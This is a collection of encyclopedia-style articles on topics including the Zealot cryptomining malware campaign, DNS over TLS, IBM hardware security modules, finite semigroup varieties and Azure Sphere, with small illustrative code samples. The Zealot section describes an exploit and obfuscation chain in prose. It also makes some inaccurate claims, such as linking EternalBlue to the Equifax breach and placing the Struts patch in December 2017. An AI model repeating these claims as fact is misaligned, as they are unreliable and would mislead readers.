Certain anti-virus companies have been able to overcome ZeuS Panda's stealth capabilities and remove it from infected systems. Some work from a list of indicators of compromise (IoCs) and can also determine which campaign a given version of ZeuS Panda originated from. The IoCs are signatures left behind by the malware, as well as IP addresses, hashes, or URLs linked to command and control servers. Once the anti-virus software determines that ZeuS Panda is infecting the system, it runs an automatic routine to completely remove the malware and, if possible, its loader. There are also ways to remove it manually.

References

Windows trojans
57070427
https://en.wikipedia.org/wiki/Tr%C3%A9sor
Trésor
Trésor may refer to:

People
Marius Trésor (born 1950), French footballer
Trésor Kandol (born 1981), Congolese footballer
Tresor Kangambu (born 1987), Qatari footballer
Trésor Mputu (born 1985), Congolese footballer
Tresor (singer) (born 1987), Congolese singer

Other
Trésor public, the national administration of the Treasury in France
Trésor (album), a 2010 album by Kenza Farah
Tresor (club), a German nightclub and record label
:fr:Trésor (film, 2009), a film with Fanny Ardant
:fr:Trésor (parfum), a 1990 perfume by Lancôme
Le Trésor, a 1980 novel by Juliette Benzoni
TRESOR, an encryption system for Linux computers
57070751
https://en.wikipedia.org/wiki/Zealot%20Campaign%20%28Malware%29
Zealot Campaign (Malware)
The Zealot Campaign is a cryptocurrency-mining malware campaign assembled from a series of stolen National Security Agency (NSA) exploits, released by the Shadow Brokers group, that attacks both Windows and Linux machines to mine cryptocurrency, specifically Monero. Discovered in December 2017, the exploits appearing in the Zealot suite include EternalBlue, EternalSynergy, and the Apache Struts Jakarta Multipart Parser attack exploit, or . The other notable exploit within the Zealot vulnerabilities is vulnerability , known as DotNetNuke (DNN), which exploits a content management system so that the attacker can install Monero-mining software. An estimated US$8,500 of Monero has been mined on a single targeted computer. The campaign was discovered and studied extensively by F5 Networks in December 2017.

How it works
With many of the Zealot exploits having been leaked from the NSA, the malware suite is widely described as having an unusually highly obfuscated payload, meaning that the exploit works on multiple levels to attack vulnerable server systems, causing large amounts of damage. The term "Zealot" was derived from the StarCraft series, namely a type of warrior.

Introduction
This multi-layered attack begins with two HTTP requests, used to scan for and target vulnerable systems on the network. Similar attacks in the past targeted either Windows or Linux-based systems; Zealot stands out by being prepared for both, with its version of the Apache Struts exploit along with its use of DNN.

Post-exploitation stage
After the operating system (OS) has been identified via JavaScript, the malware loads an OS-specific exploit chain:

Linux/macOS
If the targeted system runs either Linux or macOS, the Struts payload installs a Python agent for the post-exploitation stage. After checking whether the target system has already been infected, it downloads cryptocurrency-mining software, often referred to as a "mule".
From there, it decodes and runs an embedded, obfuscated Python payload. Unlike other botnet malware, the Zealot campaign's requests to the command and control (C&C) server carry specific User-Agent and Cookie headers, meaning that anyone but the malware will receive a different response. Because Zealot encrypts its communications with an RC4 cipher (see below), most network-inspection and security software could see that the malware was on the network but could not inspect it.

Windows
If the targeted OS is Windows, the Struts payload downloads an encoded PowerShell interpreter. Once it has been decoded twice, the program runs another obfuscated script, which in turn directs the device to a URL to download more files. That file, the PowerShell script "scv.ps1", is heavily obfuscated and allows the attacker to deploy mining software on the targeted device. The deployed software can also use a dynamic-link library (DLL) mining payload, which is deployed using the reflective DLL injection technique to attach the malware to the PowerShell process itself, so as to remain undetected.

Scanning for a firewall
Before moving to the next stage, the program also checks whether a firewall is active. If so, it pipes embedded base64-encoded Python code to circumvent the firewall. The program also checks for the firewall application "Little Snitch" and may terminate if it is active.

Infecting internal networks
From the post-exploitation stage, the program scans the target system for Python 2.7 or higher; if Python is not found on the system, it downloads it. It then downloads a Python module (probe.py) to propagate across the network. The script itself is highly obfuscated with base64 encoding and is zipped up to 20 times. The downloaded zip file can carry any of several names, all derived from the StarCraft game.
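The layered base64-plus-zip wrapping makes static inspection harder, but it can be peeled mechanically. A sketch of how an analyst might unwrap such a payload (the wrapping scheme here, zlib inside base64, is an assumption for illustration; the real scripts' exact layering differs):

```python
import base64
import zlib

def wrap(payload: bytes, rounds: int) -> bytes:
    """Simulate repeated compress-then-base64 wrapping of a payload."""
    for _ in range(rounds):
        payload = base64.b64encode(zlib.compress(payload))
    return payload

def unwrap(blob: bytes) -> bytes:
    """Peel base64+zlib layers until the data no longer decodes."""
    while True:
        try:
            blob = zlib.decompress(base64.b64decode(blob, validate=True))
        except Exception:
            return blob  # innermost layer reached (or input was never wrapped)

layered = wrap(b"probe_payload = 'propagate via port 445'", 20)
assert unwrap(layered) == b"probe_payload = 'propagate via port 445'"
```

The loop stops as soon as a layer fails to decode, so it recovers the innermost script regardless of how many times it was wrapped.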
The files included are listed below:
Zealot.py – main script executing the EternalBlue and EternalSynergy exploits (see below)
A0.py – EternalSynergy exploit with built-in shellcode for Windows 7
A1.py – EternalBlue exploit for Windows 7, receives shellcode as an argument
A2.py – EternalBlue exploit for Windows 8, receives shellcode as an argument
M.py – SMB protocol wrapper
Raven64.exe – scans the internal network via port 445 and invokes the zealot.py files
After all these files run successfully, the miner software is introduced.

Mining
Known commonly as the "mule" malware, this PowerShell script is named "minerd_n.ps2" within the compressed files that are downloaded and executed via the EternalSynergy exploit. The software then utilizes the target system's hardware to mine cryptocurrency. This mining software has reportedly stolen close to $8,500 from one victim, yet the total amount of mined Monero is still a matter of speculation among researchers.

Exploits involved
EternalBlue
Initially utilized in the WannaCry ransomware attack in 2017, this exploit was used in the Zealot campaign specifically to deliver mining software.

EternalSynergy
While not much is known about this exploit, it was used in cooperation with EternalBlue and other exploits in the Zealot campaign and elsewhere. Most notably, EternalSynergy was involved in the Equifax hack, the WannaCry ransomware, and cryptocurrency-mining campaigns.

DNN
An ASP.NET-based content management system, DNN (formerly DotNetNuke) is exploited by sending a serialized object via a vulnerable DNNPersonalization cookie during the HTTP request stage. Using an "ObjectDataProvider" and an "ObjectStateFormatter", the attacker then embeds another object into the victim's shell system. The invoked shell then delivers the same script that is delivered in the Apache Struts exploit. The DNN exploit acts as a secondary backup for the attackers, should the Apache Struts exploit fail.
Apache Struts Jakarta Multipart Parser
Used to deliver a PowerShell script to initiate the attack, this exploit accounts for one of the two HTTP requests sent during the initial stage of infection. Among the first of the Zealot exploits to be discovered, the Jakarta Parser exploit allowed hackers to abuse a zero-day flaw in the software to break into the financial firm Equifax in March 2017. This exploit was the most notable and public of the set, as it was utilized in a highly public case, and it was still being used until December 2017, when it was patched.

Uses
The Lazarus Group
The Lazarus Group, best known for the Bangladesh Bank heist, utilized a spear-phishing method commonly known as business email compromise (BEC) to steal cryptocurrency from unsuspecting employees. Lazarus primarily targeted employees of cryptocurrency financial organizations; the attack was executed via a Word document claiming to come from a legitimate-appearing European company. When the document was opened, the embedded trojan would load onto the computer and begin to steal credentials and install other malware. While the specific malware is still unknown, it has ties to the Zealot malware.

Equifax data breach (2017)
Among the several exploits involved in the March 2017 Equifax data breach, the Jakarta Parser, EternalBlue, and EternalSynergy were heavily involved in attacking the servers. Instead of the software being used to mine cryptocurrency, it was used to mine the data of over 130 million Equifax customers.

References

Malware
Cryptocurrencies
57070883
https://en.wikipedia.org/wiki/DNS%20over%20TLS
DNS over TLS
DNS over TLS (DoT) is a network security protocol for encrypting and wrapping Domain Name System (DNS) queries and answers via the Transport Layer Security (TLS) protocol. The goal of the method is to increase user privacy and security by preventing eavesdropping and manipulation of DNS data via man-in-the-middle attacks. While DNS over TLS is applicable to any DNS transaction, it was first standardized for use between stub or forwarding resolvers and recursive resolvers, in May 2016. Subsequent IETF efforts specify the use of DoT between recursive and authoritative servers ("Authoritative DNS over TLS" or "ADoT") and a related implementation between authoritative servers (zone transfer over TLS, or "xfr-over-TLS").

Server software
BIND supports DoT connections as of version 9.17; earlier versions offered DoT capability by proxying through stunnel. Unbound has supported DNS over TLS since 22 January 2018. Unwind has supported DoT since 29 January 2019. With Android Pie's support for DNS over TLS, some ad blockers now support the encrypted protocol as a relatively easy way to access their services, compared with the various workaround methods typically used, such as VPNs and proxy servers. Simple DNS Plus, a resolving and authoritative DNS server for Windows, added support for DoT in version 9.0, released 28 September 2021.

Client software
Android clients running Android 9 (Pie) or newer support DNS over TLS and will use it by default if the network infrastructure, for example the ISP, supports it. In April 2018, Google announced that Android Pie would include support for DNS over TLS, allowing users to set a DNS server phone-wide on both Wi-Fi and mobile connections, an option that was historically only possible on rooted devices. DNSDist, from PowerDNS, also announced support for DNS over TLS in version 1.3.0. Linux and Windows users can use DNS over TLS as a client through the NLnet Labs stubby daemon or Knot Resolver.
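Beyond ready-made clients, the protocol itself is straightforward: a DoT client opens a TLS session to port 853 and exchanges ordinary DNS messages, each prefixed with a two-byte length as in DNS over TCP. A minimal sketch (the resolver hostname in the usage comment is illustrative):

```python
import socket
import ssl
import struct

def build_query(name: str, qtype: int = 1, qid: int = 0x1234) -> bytes:
    """Build a minimal DNS query message (header plus one A-record question)."""
    header = struct.pack(">HHHHHH", qid, 0x0100, 1, 0, 0, 0)  # RD flag, 1 question
    qname = b"".join(bytes([len(label)]) + label.encode() for label in name.split("."))
    return header + qname + b"\x00" + struct.pack(">HH", qtype, 1)  # QCLASS=IN

def frame(message: bytes) -> bytes:
    """Prefix the message with its two-byte length, as DNS over TCP/TLS requires."""
    return struct.pack(">H", len(message)) + message

def query_dot(server: str, name: str) -> bytes:
    """Send one query over TLS to port 853 and return the raw DNS response."""
    ctx = ssl.create_default_context()
    with socket.create_connection((server, 853), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=server) as tls:
            tls.sendall(frame(build_query(name)))
            (length,) = struct.unpack(">H", tls.recv(2))
            return tls.recv(length)

# Example (requires network access): query_dot("dns.quad9.net", "example.com")
```

The two-byte length prefix is the only framing difference from DNS over UDP; everything inside the TLS stream is a standard DNS message.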
Alternatively they may install getdns-utils to use DoT directly with the getdns_query tool. The unbound DNS resolver by NLnet Labs also supports DNS over TLS. Apple's iOS 14 introduced OS-level support for DNS over TLS (and DNS over HTTPS). iOS does not allow manual configuration of DoT servers, and requires the use of a third-party application to make configuration changes. systemd-resolved is a Linux-only implementation that can be configured to use DNS over TLS, by editing /etc/systemd/resolved.conf and enabling the setting DNSOverTLS. Most major Linux distributions have systemd installed by default. personalDNSfilter is an open source DNS filter with support for DoT and DNS over HTTPS (DoH) for Java-enabled devices including Android. Nebulo is an open source DNS changer application for Android which supports both DoT and DoH. Public resolvers DNS-over-TLS was first implemented in a public recursive resolver by Quad9 in 2017. Other recursive resolver operators such as Google and Cloudflare followed suit in subsequent years, and now it is a broadly-supported feature generally available in most large recursive resolvers. Criticisms and implementation considerations DoT can impede analysis and monitoring of DNS traffic for cybersecurity purposes. DoT has been used to bypass parental controls which operate at the (unencrypted) standard DNS level; Circle, a parental control router which relies on DNS queries to check domains against a blocklist, blocks DoT by default due to this. However, there are DNS providers that offer filtering and parental controls along with support for both DoT and DoH. In that scenario, DNS queries are checked against block lists once they are received by the provider rather than prior to leaving the user's router. Encryption by itself does not protect privacy. It only protects against third-party observers. It does not guarantee what the endpoints do with the (then decrypted) data. 
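For instance, the systemd-resolved setting mentioned above amounts to a short edit of /etc/systemd/resolved.conf; the resolver address and certificate hostname below (Quad9's) are an illustrative example, not taken from the text:

```ini
[Resolve]
# Upstream resolver, optionally pinned to a TLS certificate hostname
DNS=9.9.9.9#dns.quad9.net
# "yes" enforces DoT; "opportunistic" falls back to plaintext if TLS fails
DNSOverTLS=yes
```

The change takes effect after restarting the service, e.g. with `systemctl restart systemd-resolved`.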
DoT clients do not necessarily directly query any authoritative name servers. The client may rely on the DoT server using traditional (port 53 or 853) queries to finally reach authoritative servers. Thus, DoT does not qualify as an end-to-end encrypted protocol; it is only hop-to-hop encrypted, and only if DNS over TLS is used consistently. Alternatives DNS over HTTPS (DoH) is a similar protocol standard for encrypting DNS queries, differing from DoT only in the methods used for encryption and delivery. Whether either protocol is superior on the basis of privacy and security is a matter of debate; some argue the merits of each depend on the specific use case. DNSCrypt is another network protocol that authenticates and encrypts DNS traffic, although it was never proposed to the Internet Engineering Task Force (IETF) with a Request for Comments (RFC). See also DNSCurve Public recursive name server References External links – Specification for DNS over Transport Layer Security (TLS) – Usage Profiles for DNS over TLS and DNS over DTLS DNS Privacy Project: dnsprivacy.org Domain Name System Internet protocols Application layer protocols Internet security Transport Layer Security
57088805
https://en.wikipedia.org/wiki/IBM%204767
IBM 4767
The IBM 4767 PCIe Cryptographic Coprocessor is a hardware security module (HSM) that includes a secure cryptoprocessor implemented on a high-security, tamper resistant, programmable PCIe board. Specialized cryptographic electronics, microprocessor, memory, and random number generator housed within a tamper-responding environment provide a highly secure subsystem in which data processing and cryptography can be performed. Sensitive key material is never exposed outside the physical secure boundary in a clear format. The IBM 4767 is validated to FIPS PUB 140-2 Level 4, the highest level of certification achievable for commercial cryptographic devices. The IBM 4767 data sheet describes the coprocessor in detail. IBM supplies two cryptographic-system implementations: The PKCS#11 implementation creates a high-security solution for application programs developed for this industry-standard API. The IBM Common Cryptographic Architecture (CCA) implementation provides many functions of special interest in the finance industry, extensive support for distributed key management, and a base on which custom processing and cryptographic functions can be added. Toolkits for custom application development are also available. Applications may include financial PIN transactions, bank-to-clearing-house transactions, EMV transactions for integrated circuit (chip) based credit cards, and general-purpose cryptographic applications using symmetric key algorithms, hashing algorithms, and public key algorithms. The operational keys (symmetric or RSA private) are generated in the coprocessor and are then saved either in a keystore file or in application memory, encrypted under the master key of that coprocessor. Any coprocessor with an identical master key can use those keys. Performance benefits include the incorporation of elliptic curve cryptography (ECC) and format preserving encryption (FPE) in the hardware. 
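The master-key scheme described above (operational keys leaving the device only in encrypted form) can be sketched conceptually. The toy below is emphatically not the coprocessor's actual cryptography; it substitutes a hash-derived XOR keystream for the real hardware ciphers purely to show the wrap/unwrap workflow:

```python
import hashlib
import secrets

def _keystream(master_key: bytes, nonce: bytes, length: int) -> bytes:
    # Toy keystream from SHA-256 in counter mode; real HSMs use hardware
    # AES/TDES engines, not this construction.
    stream = b""
    counter = 0
    while len(stream) < length:
        stream += hashlib.sha256(master_key + nonce + counter.to_bytes(4, "big")).digest()
        counter += 1
    return stream[:length]

def wrap_key(master_key: bytes, operational_key: bytes) -> bytes:
    """Encrypt an operational key under the master key before it leaves the device."""
    nonce = secrets.token_bytes(16)
    ks = _keystream(master_key, nonce, len(operational_key))
    return nonce + bytes(a ^ b for a, b in zip(operational_key, ks))

def unwrap_key(master_key: bytes, wrapped: bytes) -> bytes:
    """Recover the operational key; only a holder of the same master key can do this."""
    nonce, body = wrapped[:16], wrapped[16:]
    ks = _keystream(master_key, nonce, len(body))
    return bytes(a ^ b for a, b in zip(body, ks))

master = secrets.token_bytes(32)   # never leaves the coprocessor in the real device
op_key = secrets.token_bytes(24)
stored = wrap_key(master, op_key)  # safe to keep in a keystore file or app memory
assert unwrap_key(master, stored) == op_key
```

This mirrors the workflow in the paragraph above: the keystore holds only `stored`, and any coprocessor loaded with the identical master key can recover and use `op_key`.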
Supported systems IBM supports the 4767 on certain IBM Z, IBM POWER Systems, and x86 servers (Linux or Microsoft Windows). IBM Z: Crypto Express5S (CEX5S) - feature code 0890 IBM POWER systems: feature codes EJ32 and EJ33 x86: Machine type-model 4767-002 History In April 2016, the IBM 4767 superseded the IBM 4765, which was discontinued. The IBM 4767 is supported on all platforms listed above. The successor to the 4767, the IBM 4768, was introduced on IBM Z, where it is called the Crypto Express6S (CEX6S) and is available as feature code 0893. References External links These links point to various relevant cryptographic standards. ISO 13491 - Secure Cryptographic Devices: https://www.iso.org/standard/61137.html ISO 9564 - PIN security: https://www.iso.org/standard/68669.html ANSI X9.24 Part 1: Key Management using Symmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-1-2017 ANSI X9.24 Part 2: Key Management using Asymmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-2-2016 FIPS 140-2: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf Cryptographic hardware Banking technology 4767
57151064
https://en.wikipedia.org/wiki/Variety%20of%20finite%20semigroups
Variety of finite semigroups
In mathematics, and more precisely in semigroup theory, a variety of finite semigroups is a class of semigroups having some nice algebraic properties. Those classes can be defined in two distinct ways, using either algebraic notions or topological notions. Varieties of finite monoids, varieties of finite ordered semigroups and varieties of finite ordered monoids are defined similarly. This notion is very similar to the general notion of variety in universal algebra. Definition Two equivalent definitions are now given. Algebraic definition A variety V of finite (ordered) semigroups is a class of finite (ordered) semigroups that: is closed under division. is closed under taking finite Cartesian products. The first condition is equivalent to stating that V is closed under taking subsemigroups and under taking quotients. The second property implies that the empty product—that is, the trivial semigroup of one element—belongs to each variety. Hence a variety is necessarily non-empty. A variety of finite (ordered) monoids is a variety of finite (ordered) semigroups whose elements are monoids. That is, it is a class of (ordered) monoids satisfying the two conditions stated above. Topological definition In order to give the topological definition of a variety of finite semigroups, some other definitions related to profinite words are needed. Let A be an arbitrary finite alphabet. Let A⁺ be its free semigroup. Then let Â⁺ be the set of profinite words over A. Given a finite semigroup S and a semigroup morphism φ : A⁺ → S, let φ̂ : Â⁺ → S be the unique continuous extension of φ to Â⁺. A profinite identity is a pair (u, v) of profinite words, usually written u = v. A semigroup S is said to satisfy the profinite identity u = v if, for each semigroup morphism φ : A⁺ → S, the equality φ̂(u) = φ̂(v) holds. A variety of finite semigroups is the class of finite semigroups satisfying a set of profinite identities P.
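Writing φ̂ for the unique continuous extension of a semigroup morphism φ into a finite semigroup S, the satisfaction condition in the paragraph above can be stated compactly as:

```latex
S \models (u = v)
\quad\Longleftrightarrow\quad
\hat{\varphi}(u) = \hat{\varphi}(v)
\ \text{ for every semigroup morphism } \varphi : A^{+} \to S .
```

The variety defined by a set P of profinite identities is then the class of finite semigroups S with S ⊨ (u = v) for every (u, v) in P.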
A variety of finite monoids is defined like a variety of finite semigroups, with the difference that one should consider monoid morphisms φ : A* → S instead of semigroup morphisms φ : A⁺ → S. A variety of finite ordered semigroups/monoids is also given by a similar definition, with the difference that one should consider morphisms of ordered semigroups/monoids. Examples A few examples of classes of semigroups are given. The first examples use finite identities—that is, profinite identities whose two words are finite words. The next example uses profinite identities. The last one is an example of a class that is not a variety. More examples are given in the article Special classes of semigroups. Using finite identities The most trivial example is the variety S of all finite semigroups. This variety is defined by the empty set of profinite equalities. It is trivial to see that this class of finite semigroups is closed under subsemigroups, finite products, and quotients. The second most trivial example is the variety 1 containing only the trivial semigroup. This variety is defined by the set of profinite equalities {x = y}. Intuitively, this equality states that all elements of the semigroup are equal. This class is trivially closed under subsemigroups, finite products, and quotients. The variety Com of commutative finite semigroups is defined by the profinite equality xy = yx. Intuitively, this equality states that each pair of elements of the semigroup commutes. The variety of idempotent finite semigroups is defined by the profinite equality xx = x. More generally, given a profinite word u and a letter x, the profinite equality ux = xu states that the set of possible images of u contains only central elements, that is, elements commuting with every element of the semigroup. Similarly, ux = x states that the set of possible images of u contains only left identities. Finally ux = u states that the set of possible images of u is composed of left zeros.
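Finite identities such as xy = yx and xx = x can be checked mechanically on a concrete finite semigroup by quantifying over all elements. As an illustrative sketch (the example semigroup, the integers {0, 1, 2} under multiplication modulo 3, is an assumed choice, not from the text):

```python
from itertools import product

# A finite semigroup given by its elements and an associative operation.
elements = [0, 1, 2]

def op(a, b):
    return (a * b) % 3  # multiplication modulo 3 is associative and closed

def satisfies_commutativity() -> bool:
    """Check the identity xy = yx over all pairs of elements."""
    return all(op(x, y) == op(y, x) for x, y in product(elements, repeat=2))

def satisfies_idempotency() -> bool:
    """Check the identity xx = x over all elements."""
    return all(op(x, x) == x for x in elements)

assert satisfies_commutativity()     # this semigroup lies in Com
assert not satisfies_idempotency()   # 2*2 = 1 mod 3, so it is not idempotent
```

The same exhaustive check extends to any finite identity, since a finite semigroup has only finitely many morphisms from the relevant free semigroup restricted to the letters that occur in the identity.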
Using profinite identities Examples using profinite words that are not finite are now given. Given a profinite word x, let x^ω denote the profinite word lim x^{n!}. Hence, given a semigroup morphism φ : A⁺ → S, φ̂(x^ω) is the unique idempotent power of φ(x). Thus, in profinite equalities, x^ω represents an arbitrary idempotent. The class G of finite groups is a variety of finite semigroups. Note that a finite group can be defined as a finite semigroup with a unique idempotent, which in addition is a left and right identity. Once those two properties are translated in terms of profinite equalities, one can see that the variety G is defined by the set of profinite equalities {x^ω y = y, y x^ω = y}. Classes that are not varieties Note that the class of finite monoids is not a variety of finite semigroups. Indeed, this class is not closed under subsemigroups. To see this, take any finite semigroup S that is not a monoid. It is a subsemigroup of the monoid S1 formed by adjoining an identity element. Reiterman's theorem Reiterman's theorem states that the two definitions above are equivalent. A scheme of the proof is now given. Given a variety V of semigroups as in the algebraic definition, one can choose the set P of profinite identities to be the set of profinite identities satisfied by every semigroup of V. Reciprocally, given a profinite identity u = v, one can remark that the class of semigroups satisfying this profinite identity is closed under subsemigroups, quotients, and finite products. Thus this class is a variety of finite semigroups. Furthermore, varieties are closed under arbitrary intersection; thus, given an arbitrary set P of profinite identities ui = vi, the class of semigroups satisfying P is the intersection of the classes of semigroups satisfying each of those profinite identities. That is, it is an intersection of varieties of finite semigroups, and thus a variety of finite semigroups.
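The idempotent power x^ω, which interprets the profinite identities above, exists for every element of a finite semigroup and can be computed by iterating powers until they cycle. A sketch, using multiplication modulo 10 as an assumed example semigroup:

```python
def idempotent_power(x, op):
    """Return x^ω, the unique idempotent power of x in a finite semigroup."""
    powers = [x]
    p = x
    while True:
        p = op(p, x)
        if p in powers:          # the powers of x have started to cycle
            break
        powers.append(p)
    for q in powers:
        if op(q, q) == q:        # exactly one power of x is idempotent
            return q

mul_mod_10 = lambda a, b: (a * b) % 10
# Powers of 2 mod 10 are 2, 4, 8, 6, 2, ... and 6*6 = 36 = 6 mod 10.
assert idempotent_power(2, mul_mod_10) == 6
assert mul_mod_10(6, 6) == 6
```

Uniqueness holds because any idempotent power of x lies in the cycle of its powers, and a finite cyclic subsemigroup contains exactly one idempotent.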
Comparison with the notion of variety of universal algebra The definition of a variety of finite semigroups is inspired by the notion of a variety of universal algebras. We recall the definition of a variety in universal algebra. Such a variety is, equivalently: a class of structures, closed under homomorphic images, subalgebras and (direct) products. a class of structures satisfying a set of identities. The main differences between the two notions of variety are now given. In this section "variety of (arbitrary) semigroups" means "the class of semigroups as a variety of universal algebra over the vocabulary of one binary operator". It follows from the definitions of those two kinds of varieties that, for any variety V of (arbitrary) semigroups, the class of finite semigroups of V is a variety of finite semigroups. We first give an example of a variety of finite semigroups that is not similar to any subvariety of the variety of (arbitrary) semigroups. We then give the difference between the two definitions using identities. Finally, we give the difference between the algebraic definitions. As shown above, the class of finite groups is a variety of finite semigroups. However, the class of groups is not a subvariety of the variety of (arbitrary) semigroups. Indeed, (ℤ, +) is a monoid that is an infinite group. However, its submonoid (ℕ, +) is not a group. Since the class of (arbitrary) groups contains a semigroup and does not contain one of its subsemigroups, it is not a variety. The main difference between the finite case and the infinite case, when groups are considered, is that a submonoid of a finite group is a finite group, while infinite groups are not closed under taking submonoids. The class of finite groups is a variety of finite semigroups, while it is not a subvariety of the variety of (arbitrary) semigroups. Thus, Reiterman's theorem shows that this class can be defined using profinite identities.
And Birkhoff's HSP theorem shows that this class cannot be defined using identities (of finite words). This illustrates why the definition of a variety of finite semigroups uses the notion of profinite words and not the notion of identities. We now consider the algebraic definitions of varieties. Requiring that varieties are closed under arbitrary direct products implies that a variety is either trivial or contains infinite structures. In order to restrict varieties to contain only finite structures, the definition of a variety of finite semigroups uses the notion of finite product instead of the notion of an arbitrary direct product. References Mathematical structures Semigroup theory Algebraic structures
57162791
https://en.wikipedia.org/wiki/IBM%204768
IBM 4768
The IBM 4768 PCIe Cryptographic Coprocessor is a hardware security module (HSM) that includes a secure cryptoprocessor implemented on a high-security, tamper resistant, programmable PCIe board. Specialized cryptographic electronics, microprocessor, memory, and random number generator housed within a tamper-responding environment provide a highly secure subsystem in which data processing and cryptography can be performed. Sensitive key material is never exposed outside the physical secure boundary in a clear format. The IBM 4768 is validated to FIPS PUB 140-2 Level 4, the highest level of certification achievable for commercial cryptographic devices. It has achieved PCI-HSM certification. The IBM 4768 data sheet describes the coprocessor in detail. IBM supplies two cryptographic-system implementations: The PKCS#11 implementation creates a high-security solution for application programs developed for this industry-standard API. The IBM Common Cryptographic Architecture (CCA) implementation provides many functions of special interest in the finance industry, extensive support for distributed key management, and a base on which custom processing and cryptographic functions can be added. Applications may include financial PIN transactions, bank-to-clearing-house transactions, EMV transactions for integrated circuit (chip) based credit cards, and general-purpose cryptographic applications using symmetric key algorithms, hashing algorithms, and public key algorithms. The operational keys (symmetric or RSA private) are generated in the coprocessor and are then saved either in a keystore file or in application memory, encrypted under the master key of that coprocessor. Any coprocessor with an identical master key can use those keys. Performance benefits include the incorporation of elliptic curve cryptography (ECC) and format preserving encryption (FPE) in the hardware. IBM supports the 4768 on certain IBM Z mainframes as Crypto Express6S (CEX6S) - feature code 0893. 
The 4768 / CEX6S is part of IBM's support for pervasive encryption and drive to encrypt all data. In September 2019 the successor IBM 4769 was announced. References External links These links point to various relevant cryptographic standards. ISO 13491 - Secure Cryptographic Devices: https://www.iso.org/standard/61137.html ISO 9564 - PIN security: https://www.iso.org/standard/68669.html ANSI X9.24 Part 1: Key Management using Symmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-1-2017 ANSI X9.24 Part 2: Key Management using Asymmetric Techniques: https://webstore.ansi.org/RecordDetail.aspx?sku=ANSI+X9.24-2-2016 FIPS 140-2: https://nvlpubs.nist.gov/nistpubs/FIPS/NIST.FIPS.140-2.pdf Payment Card Industry (PCI) PIN Transaction Security (PTS): Hardware Security Module (HSM) Modular Security Requirements: search this site: https://www.pcisecuritystandards.org/document_library Cryptographic hardware Banking technology 4768
57165746
https://en.wikipedia.org/wiki/Azure%20Sphere
Azure Sphere
Azure Sphere is a family of services and products from Microsoft that allows vendors of Internet of Things devices to increase security by combining a specific system on a chip, the Azure Sphere OS, and an Azure-based cloud environment for continuous monitoring. Azure Sphere OS The Azure Sphere OS is a custom Linux-based microcontroller operating system created by Microsoft to run on an Azure Sphere-certified chip and to connect to the Azure Sphere Security Service. The Azure Sphere OS provides a platform for Internet of Things application development, including both high-level applications and real-time capable applications. It is the first operating system running a Linux kernel that Microsoft has publicly released and the second Unix-like operating system that the company has developed for external (public) users, the other being Xenix. Azure Sphere Security Service The Azure Sphere Security Service, sometimes referred to as AS3, is a cloud-based service that enables maintenance, updates, and control for Azure Sphere-certified chips. The Azure Sphere Security Service establishes a secure connection between a device and the internet and/or cloud services and ensures secure boot. The primary purpose of contact between an Azure Sphere device and the Azure Sphere Security Service is to authenticate the device identity, ensure the integrity and trust of the system software, and to certify that the device is running a trusted code base. The service also provides the secure channel used by Microsoft to automatically download and install Azure Sphere OS updates and customer application updates to deployed devices. Azure Sphere chips and hardware Azure Sphere-certified chips and hardware support two general implementation categories: greenfield and brownfield. Greenfield implementation involves designing and building new IoT devices with an Azure Sphere-certified chip. Azure Sphere-certified chips are currently produced by MediaTek.
In June 2019, NXP announced plans to produce a line of Azure Sphere-certified chips. In October 2019, Qualcomm announced plans to produce the first Azure Sphere-certified chips with cellular capabilities. Brownfield implementation involves the use of an Azure Sphere guardian device to securely connect an existing device to the internet. Azure Sphere guardian modules are currently produced by Avnet. MediaTek 3620 MT3620 is the first Azure Sphere-certified chip and includes an ARM Cortex-A7 processor (500 MHz), two ARM Cortex-M4F I/O subsystems (200 MHz), 5x UART/I2C/SPI, 2x I2S, 8x ADC, up to 12 PWM counters and up to 72x GPIO, and Wi-Fi capability. MT3620 contains the Microsoft Pluton security subsystem with a dedicated ARM Cortex-M4F core that handles secure boot and secure system operation. Azure Sphere Hardware Azure Sphere-certified chips can be purchased in several different hardware configurations produced by Microsoft partners. Modules Avnet Wi-Fi Module AI-Link Wi-Fi Module USI Dual Band Wi-Fi Module Development kits Avnet MT3620 Starter Kit Seeed MT3620 Dev Board Seeed MT3620 Mini Dev Board Guardian devices Avnet Guardian Module Azure Sphere Guardian module An Azure Sphere Guardian module is external, add-on hardware that incorporates an Azure Sphere-certified chip and can be used to securely connect an existing device to the internet. In addition to an Azure Sphere-certified chip, an Azure Sphere Guardian module includes the Azure Sphere OS and the Azure Sphere Security Service. A guardian module is a method of implementing secure connectivity for existing devices without exposing those devices to the internet. The guardian module can be connected to a device through an existing peripheral on the device and is then connected to the internet through Wi-Fi or Ethernet. The device itself is not connected directly to the network.
Microsoft Pluton Pluton is a Microsoft-designed security subsystem that implements a hardware-based root of trust for Azure Sphere. It includes a security processor core, cryptographic engines, a hardware random number generator, public/private key generation, asymmetric and symmetric encryption, support for elliptic curve digital signature algorithm (ECDSA) verification for secured boot, measured boot in silicon to support remote attestation with a cloud service, and various tamper countermeasures. Application development The Linux-based Azure Sphere OS provides a platform for developers to write applications that use peripherals on the Azure Sphere chip. Applications can run on either the A7 core with access to external communications or as real-time capable apps on one of the M4 processors. Real-time capable applications can run on either bare metal or with a real-time operating system (RTOS). Developer applications can be distributed to Azure Sphere devices through the same secure mechanism as the Azure Sphere OS updates. Timeline The following is a list of announcements and releases from Microsoft around Azure Sphere. See also Windows Subsystem for Linux Xenix Windows IoT References External links 2018 software ARM operating systems Computer-related introductions in 2018 Computing platforms Embedded operating systems Linux Microcontroller software Microsoft hardware Microsoft operating systems
57166533
https://en.wikipedia.org/wiki/United%20States%20Coast%20Guard%20Unit%20387%20Cryptanalysis%20Unit
United States Coast Guard Unit 387 Cryptanalysis Unit
